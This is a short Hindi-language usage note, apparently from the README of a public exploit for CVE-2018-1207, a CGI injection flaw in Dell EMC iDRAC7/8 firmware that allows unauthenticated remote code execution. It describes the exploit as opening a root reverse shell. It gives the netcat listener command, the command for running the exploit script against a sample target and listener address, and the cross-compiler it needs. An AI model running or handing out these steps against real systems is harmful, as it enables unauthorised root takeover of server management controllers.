
एक्सप्लॉइट iDRAC 7 & 8 फ़र्मवेयर < 2.52.52.52
शोषण iDRAC 7 & 8 फर्मवेयर < 2.52.52.52
Dell EMC iDRAC7/iDRAC8, संस्करण 2.52.52.52 से पहले, CGI इंजेक्शन भेद्यता रखते हैं जिसका उपयोग दूरस्थ कोड निष्पादित करने के लिए किया जा सकता है। एक दूरस्थ अप्रमाणित हमलावर संभावित रूप से CGI चर का उपयोग करके दूरस्थ कोड निष्पादित करने में सक्षम हो सकता है।
यह कोड iDRAC सेवा को रूट उपयोगकर्ता के रूप में एक रिवर्स शेल खोलने का कारण बनना चाहिए।
अपना स्थानीय लिसनर प्रारंभ करें: nc -v -l -p local_port
nc -v -l -p 5500
शोषण चलाएँ: python ./cve-2018-1207.py remote_host remote_port local_host local_port
python ./cve-2018-1207.py 192.168.1.10 443 192.168.1.200 5500
आपको sh4-linux-gnu-gcc का एक संस्करण स्थापित करना होगा, जो वर्तमान में sh4-linux-gnu-gcc-11 है।
इसे apt install gcc-11-sh4-linux-gnu के साथ स्थापित कर सकते हैं।